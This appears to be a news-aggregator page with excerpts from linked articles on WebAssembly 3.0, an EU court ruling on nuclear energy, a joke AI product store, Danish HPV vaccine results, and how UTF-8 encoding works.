Deterministic profile. To make up for the added semantic fuzziness of relaxed vector instructions, and in order to support settings that demand or need deterministic execution semantics (such as blockchains, or replayable systems), the Wasm standard now specifies a deterministic default behavior for every instruction with otherwise non-deterministic results — currently, this includes floating-point operators and their generated NaN values and the aforementioned relaxed vector instructions. Between platforms choosing to implement this deterministic execution profile, Wasm thereby is fully deterministic, reproducible, and portable.
Custom annotation syntax. Finally, the Wasm text format has been enriched with generic syntax for placing annotations in Wasm source code. Analogous to custom sections in the binary format, these annotations are not assigned any meaning by the Wasm standard itself, and can be chosen to be ignored by implementations. However, they provide a way to represent the information stored in custom sections in human-readable and writable form, and concrete annotations can be specified by downstream standards.
In addition to these core features, embeddings of Wasm into JavaScript benefit from a new extension to the JS API:
JS string builtins. JavaScript string values can already be passed to Wasm as externrefs. Functions from this new primitive library can be imported into a Wasm module to directly access and manipulate such external string values inside Wasm.
With these new features, Wasm has much better support for compiling high-level programming languages. Enabled by this, we have seen various new languages popping up to target Wasm, such as Java, OCaml, Scala, Kotlin, Scheme, or Dart, all of which use the new GC feature.
On top of all these goodies, Wasm 3.0 also is the first version of the standard that has been produced with the new SpecTec tool chain. We believe that this makes for an even more reliable specification.
Wasm 3.0 is already shipping in most major web browsers, and support in stand-alone engines like Wasmtime is on track to completion as well. The Wasm feature status page tracks support across engines.
...
Read the original on webassembly.org »
with my fellow youth climate activists alongside WePlanet two years ago, I had no idea just how quickly the anti-nuclear dominoes would fall across Europe.
In 2023, and what seems like a lifetime ago, Austria launched their legal action against the European Commission for the inclusion of nuclear energy in the EU Sustainable Finance Taxonomy. At the time they were supported by a bulwark of EU countries and environmental NGOs that opposed nuclear energy. Honestly, it looked like they might win.
Germany, long a symbol of anti-nuclear politics, is beginning to shift. The nuclear phase-outs or bans in the Netherlands, Belgium, Switzerland, Denmark, and Italy are now history. Even Fridays for Future has quietened its opposition, and in some places, embraced nuclear power.
It shows what’s possible when we stick to the science. The evidence only gets clearer by the day that nuclear energy has an extremely low environmental impact across its lifecycle, and strong regulations and safety culture ensure that it remains one of the safest forms of energy available to humanity.
The European Court of Justice has now fully dismissed Austria’s lawsuit. That ruling doesn’t just uphold nuclear energy’s place in EU green finance rules. It also signals a near-certain defeat for the ongoing Greenpeace case — the very lawsuit that inspired me to launch Dear Greenpeace in the first place.
But instead of learning from this, Greenpeace is doubling down. Martin Kaiser, Executive Director of Greenpeace Germany, called the court decision “a dark day for the climate”.
Let that sink in. The highest court in the EU just reaffirmed that nuclear energy meets the scientific and environmental standards to be included in sustainable finance, and Greenpeace still refuses to budge.
Meanwhile, the climate crisis gets worse. Global emissions are not falling fast enough. Billions of people still lack access to clean, reliable electricity. And we are forced to spend time defending proven solutions instead of scaling them.
It’s now up to the court whether we will get our time in court to outline the evidence in support of nuclear energy and the important role it can play in the global clean energy transition. Whether in court, on the streets, or in the halls of parliaments across the globe, we will be there to defend the science and ensure that nuclear power can spread the advantages of the modern world across the planet in a sustainable, reliable and dignified way.
Austria stands increasingly isolated among a handful of countries that still cling to their opposition to nuclear energy. Their defeat in this vital high stakes topic is a success not just for the nuclear movement, but for the global transition as a whole.
We have made real progress. Together, we’ve helped defend nuclear power in the EU, overturned outdated policies at the World Bank, and secured more technology-neutral language at the UN. These wins are not abstract. They open the door to real investment, real projects, and real emissions cuts.
This is a great success for the movement and it would not have been possible without the financial support, time and energy given by people like you.
...
Read the original on www.weplanet.org »
We’ll find it somewhere across parallel dimensions, just tell us what you wantFind It NowWhat people are sayingThis made me LoL so many times. It is the best thing to come from AIThis is the complete opposite of AI Slop: A website that turns absurd queries into unbelievable producs, all for the lulzThis is a hilarious take on generative AI: 😂 an infinite marketplace of any impossibly absurd product you can dream up. Ridiculous, but awesome. And, a domain that fitsIt’s literally an online store that sells… nothing. Well, it sells concepts of products that don’t exist. And it’s more than brilliant!It’s just like the real ones, except you don’t have to deal with disappointment or the returns process. Many things in it could and should be real objectsA web service that uses generative AI to fulfill the desire for ’I want this kind of product!’The internet is back! I haven’t felt such a thrilling sense of high-effort whimsical pointlessness since the early 2000sI asked for invisible cheese burger, it was very visible, very terrible service, 10/10 would use againThis made me LoL so many times. It is the best thing to come from AIThis is the complete opposite of AI Slop: A website that turns absurd queries into unbelievable producs, all for the lulzThis is a hilarious take on generative AI: 😂 an infinite marketplace of any impossibly absurd product you can dream up. Ridiculous, but awesome. And, a domain that fitsIt’s literally an online store that sells… nothing. Well, it sells concepts of products that don’t exist. And it’s more than brilliant!It’s just like the real ones, except you don’t have to deal with disappointment or the returns process. Many things in it could and should be real objectsAll our products are unique concepts developed specifically for our customers. Our product concepts are delivered instantly to your device!Experience a new way of shopping where imagination drives innovation.Be the first to discover it! Give us a name and we’ll find it somewhereInvent NowYou really want emails about fictional products every week? Well, okay then…© 2025 anycrap.shop — tomorrow’s products, available today (not actually available)
...
Read the original on anycrap.shop »
Denmark has effectively eliminated infections with the two biggest cancer-causing strains of human papillomavirus (HPV) since the vaccine was introduced in 2008, data suggests.
The research, published in Eurosurveillance, could have implications for how vaccinated populations are screened in the coming years — particularly as people increasingly receive vaccines that protect against multiple high-risk types of HPV virus.
After breast cancer, cervical cancer is the most common type of cancer among women aged 15 to 44 years in Europe, and human papillomavirus (HPV) is the leading cause.
At least 14 high-risk types of the virus have been identified, and before Denmark introduced the HPV vaccine in 2008, HPV types 16 and 18 accounted for around three quarters (74%) of cervical cancers in the country.
Initially, girls were offered a vaccine that protected against four types of HPV: 16, 18, plus the lower risk types 6 and 11. However, since 2017, Danish girls have been offered a vaccine that protects against nine types of HPV — including those accounting for approximately 90% of cervical cancers.
To better understand the impact that these vaccination programmes have had on HPV prevalence as vaccinated girls reach cervical screening age (23 to 64 years in Denmark), Dr Mette Hartmann Nonboe at Zealand University Hospital in Nykøbing Falster and colleagues analysed up to three consecutive cervical cell samples collected from Danish women between 2017 and 2024, when they were 22 to 30 years of age.
“In 2017, one of the first birth cohorts of women in Denmark who were HPV-vaccinated as teenage girls in 2008 reached the screening age of 23 years,” Nonboe explained.
“Compared with previous generations, these women are expected to have a considerably lower risk of cervical cancer, and it is pertinent to assess [their] future need for screening.”
The research found that infection with the high-risk HPV types (HPV16/18) covered by the vaccine has been almost eliminated.
“Before vaccination, the prevalence of HPV16/18 was between 15 and 17%, which has decreased in vaccinated women to less than one percent by 2021,” the researchers said.
In addition, prevalence of HPV types 16 and 18 in women who had not been vaccinated against HPV was five percent. This strongly suggests that the vaccine has reduced the circulation of these HPV types in general population, to the extent that even unvaccinated women are now less likely to be infected with them — so called “population immunity” — the researchers said.
Despite this good news, roughly one third of women screened during the study period still had infection with high-risk HPV types not covered by the original vaccines — and new infections with these types were more frequent among vaccinated women, compared to unvaccinated ones.
This is expected to fall once girls who received the more recent ‘nine-valent’ vaccine reach screening age. At this point, the screening guidelines should potentially be reconsidered, Nonboe and colleagues said.
...
Read the original on www.gavi.org »
The first time I learned about UTF-8 encoding, I was fascinated by how well-thought and brilliantly it was designed to represent millions of characters from different languages and scripts, and still be backward compatible with ASCII.
Basically UTF-8 uses 32 bits and the old ASCII uses 7 bits, but UTF-8 is designed in such a way that:
* Every UTF-8 encoded file that has only ASCII characters is a valid ASCII file.
Designing a system that scales to millions of characters and still be compatible with the old systems that use just 128 characters is a brilliant design.
Note: If you are already aware of the UTF-8 encoding, you can explore the UTF-8 Playground utility that I built to visualize UTF-8 encoding.
UTF-8 is a variable-width character encoding designed to represent every character in the Unicode character set, encompassing characters from most of the world’s writing systems.
It encodes characters using one to four bytes.
The first 128 characters (U+0000 to U+007F) are encoded with a single byte, ensuring backward compatibility with ASCII, and this is the reason why a file with only ASCII characters is a valid UTF-8 file.
Other characters require two, three, or four bytes. The leading bits of the first byte determine the total number of bytes that represents the current character. These bits follow one of four specific patterns, which indicate how many continuation bytes follow.
Notice that the second, third, and fourth bytes in a multi-byte sequence always start with 10. This indicates that these bytes are continuation bytes, following the main byte.
The remaining bits in the main byte, along with the bits in the continuation bytes, are combined to form the character’s code point. A code point serves as a unique identifier for a character in the Unicode character set. A code point is typically represented in hexadecimal format, prefixed with “U+”. For example, the code point for the character “A” is U+0041.
So here is how a software determines the character from the UTF-8 encoded bytes:
Read a byte. If it starts with 0, it’s a single-byte character (ASCII). Show the character represented by the remaining 7 bits on the screen. Continue with the next byte.
If the byte didn’t start with a 0, then:
If it starts with 110, it’s a two-byte character, so read the next byte as well.
If it starts with 1110, it’s a three-byte character, so read the next two bytes.
If it starts with 11110, it’s a four-byte character, so read the next three bytes.
Once the number of bytes are determined, read all the remaining bits except the leading bits, and find the binary value (aka. code point) of the character.
Look up the code point in the Unicode character set to find the corresponding character and display it on the screen.
Read the next byte and repeat the process.
The Hindi letter “अ” (officially “Devanagari Letter A”) is represented in UTF-8 as:
The first byte 11100000 indicates that the character is encoded using 3 bytes.
The remaining bits of the three bytes:
xxxx0000 xx100100 xx000101 are combined to form the binary sequence 00001001 00000101 (0x0905 in hexadecimal). This is the code point of the character, represented as U+0905.
The code point U+0905 (see official chart) represents the Hindi letter “अ” in the Unicode character set.
Now that we understood the design of UTF-8, let’s look at a file that contains the following text:
The text Hey👋 Buddy has both English characters and an emoji character on it. The text file with this text saved on the disk will have the following 13 bytes in it:
Let’s evaluate this file byte-by-byte following the UTF-8 decoding rules:
Now this is a valid UTF-8 file, but it doesn’t have to be “backward compatible” with ASCII because it contains a non-ASCII character (the emoji). Next let’s create a file that contains only ASCII characters.
The text file doesn’t have any non-ASCII characters. The file saved on the disk has the following 9 bytes in it:
Let’s evaluate this file byte-by-byte following the UTF-8 decoding rules:
So this is a valid UTF-8 file, and it is also a valid ASCII file. The bytes in this file follows both the UTF-8 and ASCII encoding rules. This is how UTF-8 is designed to be backward compatible with ASCII.
I did a quick research on any other encoding that are backward compatible with ASCII, and there are a few, but they are not as popular as UTF-8, for example GB 18030 (a Chinese government standard). Another one is the ISO/IEC 8859 encodings are single-byte encodings that extend ASCII to include additional characters, but they are limited to 256 characters.
The siblings of UTF-8, like UTF-16 and UTF-32, are not backward compatible with ASCII. For example, the letter ‘A’ in UTF-16 is represented as: 00 41 (two bytes), while in UTF-32 it is represented as: 00 00 00 41 (four bytes).
When I was exploring the UTF-8 encoding, I couldn’t find any good tool to interactively visualize how UTF-8 encoding works. So I built UTF-8 Playground to visualize and play around with UTF-8 encoding. Give it a try!.
Read an ocean of knowledge and references that extends this post on Hacker News.
You can also find discussions on OSnews, lobste.rs, and Hackaday
Joel Spolsky’s famous 2003 article (still relevant): The Absolute Minimum Every Software Developer Absolutely, Positively Must Know About Unicode and Character Sets (No Excuses!)
“UTF-8 was designed, in front of my eyes, on a placemat in a New Jersey diner one night in September or so 1992.” - Rob Pike on designing UTF-8 with Ken Thompson
An excellent explainer by Russ Cox: UTF-8: Bits, Bytes, and Benefits
...
Read the original on iamvishnu.com »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.